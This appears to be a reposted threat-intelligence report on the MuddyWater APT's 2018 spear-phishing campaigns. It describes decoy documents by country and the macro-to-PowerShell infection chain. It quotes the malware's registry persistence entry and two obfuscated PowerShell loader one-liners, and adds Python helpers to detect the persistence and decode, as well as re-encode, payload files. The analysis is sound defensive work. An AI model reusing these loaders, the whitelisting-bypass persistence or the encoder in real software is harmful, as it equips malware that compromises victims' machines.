MuddyWater expands operations

Category: Cyber security | Posted by: 店小二04 | Date: 2018 | Author: 红领巾
Summary

MuddyWater is a relatively new APT that surfaced in 2017. It has focused mainly on governmental targets in Iraq and Saudi Arabia, according to past telemetry. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were also detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and escalated from May onwards. The attacks are still ongoing.

The new spear-phishing docs used by MuddyWater rely on social engineering to persuade users to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of this research, we were able not only to observe additional files and tools from the attackers’ arsenal but also some OPSEC mistakes made by the attackers.

Decoy images by country

[Decoy document images omitted; their captions, grouped by country, follow.]

Jordan: The Hashemite Kingdom of Jordan, Ministry of Justice (mwjo.doc); DAMAMAX.doc
Turkey: Turkey’s General Directorate of Security; Turkey’s Directorate General of Coastal Safety; Turkey’s General Directorate of Security (Onemli Rapor.doc); Turkey’s Ministry of the Interior (Early election.doc)
Saudi Arabia: Document signed by the Major General Pilot, commander of the Saudi Royal Air Force; KSA King Saud University (KSU) (two decoys)
Azerbaijan: İnkişaf üçün görüş.doc (meeting for development)
Iraq: Iraqi Ministry of Foreign Affairs; Government of Iraq, the Treasury of the Council of Ministers
Pakistan: ECP.doc; National Assembly of Pakistan.doc; P.Police.doc
Afghanistan: President.doc, E-government of Afghanistan

Technical details

Below is a description of the malware extraction and execution flow, starting from the initial infection vector, running VBA code via a macro and then dropping the PowerShell code that establishes command-center communications, sends victim system information and then receives commands supported by the malware.

The initial infection vector

The initial infection starts with macro-enabled Office 97-2003 Word files whose macros are usually password-protected to hinder static analysis.


Malicious obfuscated VBA code is executed when the macro is first enabled. In some cases, the malicious macro is also executed when the user activates a fake text box.

The macro payload analysis, dropped files and registry keys

The macro payload, which is Base64 encoded, does the following:

Drops two or three files into the “ProgramData” folder. The dropped files are either in the root of the “ProgramData” folder or in a subdirectory. The file names may vary from one version of the malware to another, for example:

\EventManager.dll
\EventManager.logs
\windowsDefenderService.ini

Adds a registry entry in the current user’s Run key (HKCU) for later execution when the user next logs in. In some cases, the macro spawns the malicious payload/process immediately without waiting for the next time the user logs in. The registry keys and executables may vary from one version of the malware to another.

Name: WindowsDefenderUpdater
Type: REG_EXPAND_SZ
Data: c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,

The next time the user logs in, the dropped payload will be executed. The executables have been chosen specifically for bypassing whitelisting solutions since they are all from Microsoft and very likely whitelisted. Regardless of the file extensions, the files dropped by the macro are EITHER INF, SCT and text files OR VBS and text files.
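As an added triage example (not code from the original article), the following Python function parses HKCU Run values and flags the rundll32/advpack.dll LaunchINFSection pattern described above, adding reasons when the INF argument hides behind a non-.inf extension or sits under ProgramData. The sample Run values are constructed here; the first one is the page's own entry.

```python
import ntpath
import shlex

# Constructed sample of (value name, data) pairs as they would be read from
# HKCU\Software\Microsoft\Windows\CurrentVersion\Run. The first entry is the
# page's own persistence value; the other two are benign entries for contrast.
SAMPLE_RUN_VALUES = [
    ("WindowsDefenderUpdater",
     r"c:\windows\system32\rundll32.exe advpack.dll,LaunchINFSection C:\ProgramData\EventManager.logs,Defender,1,"),
    ("OneDrive",
     r'"C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background'),
    ("DriverSetup",
     r"C:\Windows\System32\rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 132 C:\drivers\mouse.inf"),
]

def split_command(data):
    """Tokenise a Windows command line; posix=False keeps backslashes literal."""
    return [tok.strip('"') for tok in shlex.split(data, posix=False)]

def flag_run_value(name, data):
    """Return a finding dict for the rundll32 advpack.dll,LaunchINFSection
    pattern, or None when the value does not match it."""
    tokens = split_command(data)
    if len(tokens) < 3 or ntpath.basename(tokens[0]).lower() != "rundll32.exe":
        return None
    dll, _, func = tokens[1].partition(",")
    if ntpath.basename(dll).lower() != "advpack.dll" or func.lower() != "launchinfsection":
        return None
    # LaunchINFSection takes "<inf>,<section>,<flags>,<reboot>" as one argument string
    inf_path = " ".join(tokens[2:]).split(",")[0].strip()
    reasons = ["rundll32 + advpack.dll,LaunchINFSection: INF executed through a signed Microsoft binary"]
    if ntpath.splitext(inf_path)[1].lower() != ".inf":
        reasons.append("INF content hidden behind a non-.inf extension: " + inf_path)
    if "\\programdata\\" in inf_path.lower():
        reasons.append("INF stored under ProgramData, which standard users can write to")
    return {"name": name, "inf": inf_path, "reasons": reasons}

def scan_run_values(values):
    """Apply flag_run_value to every (name, data) pair and keep the findings."""
    return [hit for hit in (flag_run_value(n, d) for n, d in values) if hit]

if __name__ == "__main__":
    for hit in scan_run_values(SAMPLE_RUN_VALUES):
        print(hit["name"], "->", hit["inf"])
        for reason in hit["reasons"]:
            print("   ", reason)
```

On a live host, feed the function the (name, data) pairs enumerated from the Run key instead of the constructed list.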

Case 1: INF, SCT and text files dropped by the macro

The INF is launched via the advpack.dll “LaunchINFSection” function. The INF registers the SCT file (scriptlet file) via scrobj.dll (Microsoft Scriptlet library). Via WMI (winmgmt), the JavaScript or VBScript code in the SCT file spawns a PowerShell one-liner which finally consumes the text file.

powershell.exe -exec Bypass -c $s=(get-content C:\\ProgramData\\WindowsDefenderService.ini);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));

PowerShell one-liner
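The one-liner above is a custom decoder: every character of the text file is a base-52 digit (character code minus 40), three digits are folded into one integer, its non-zero bytes are emitted low byte first, and the whole buffer is reversed before being passed to iex. As an added analysis example (not code from the original article), the Python below reimplements that decoder so the .ini content can be recovered offline; the encoder is written from the decoder as an assumption, since the attackers' encoder is not on the page, and exists only to build a constructed sample for a round trip.

```python
DIGIT_BASE = 52     # $v = ($v*52) + ...
DIGIT_OFFSET = 40   # ... + ([Int32][char]$s[$c] - 40): digit alphabet is chr(40)..chr(91)
GROUP = 3           # bytes are emitted after every third character

def decode_muddywater_ini(encoded):
    """Mirror the one-liner's loop: fold three base-52 digits into an integer,
    emit its non-zero bytes low byte first, then reverse the whole buffer."""
    out, v = [], 0
    for i, ch in enumerate(encoded.rstrip("\r\n")):
        digit = ord(ch) - DIGIT_OFFSET
        if not 0 <= digit < DIGIT_BASE:
            raise ValueError("offset %d: %r is outside the digit alphabet" % (i, ch))
        v = v * DIGIT_BASE + digit
        if (i + 1) % GROUP == 0:
            while v:
                b = v % 256
                if b:                      # the loader drops zero bytes (padding)
                    out.append(chr(b))
                # PowerShell's [Int32]($v/256) rounds to nearest; floor division
                # agrees with it only while every byte is < 128, i.e. ASCII payloads
                v //= 256
    return "".join(reversed(out))

def encode_muddywater_ini(plaintext):
    """Inverse transform, written from the decoder (assumption: the attackers'
    encoder is not on the page). Reverses the text, packs two ASCII bytes per
    group little-endian and writes the value as three big-endian base-52 digits."""
    data = plaintext.encode("ascii")[::-1]
    digits = []
    for j in range(0, len(data), 2):
        v = int.from_bytes(data[j:j + 2].ljust(2, b"\0"), "little")
        group = []
        for _ in range(GROUP):
            group.append(chr(v % DIGIT_BASE + DIGIT_OFFSET))
            v //= DIGIT_BASE
        digits.extend(reversed(group))
    return "".join(digits)

if __name__ == "__main__":
    # Constructed sample standing in for C:\ProgramData\WindowsDefenderService.ini
    sample = encode_muddywater_ini("Write-Host 'decoded payload'")
    print(sample)
    print(decode_muddywater_ini(sample))
```

On a real sample, pass the file's contents to decode_muddywater_ini; the decoded PowerShell comes back as a string for review.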

[Figure omitted: the encoded text file]

Execution flow: [figure omitted]

Case 2: VBS and text files dropped by the macro

The VBS file decodes itself and calls mshta.exe, passing it one line of VBScript code, which in turn spawns a PowerShell one-liner which finally consumes the text file (usually Base64-encoded text).

powershell.exe -w 1 -exec Bypass -nologo -noprofile -c iex([System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String((get-content C:\ProgramData\ZIPSDK\ProjectConfManagerNT.ini))));

PowerShell one-liner

Source link: https://www.codesec.net/view/603938.html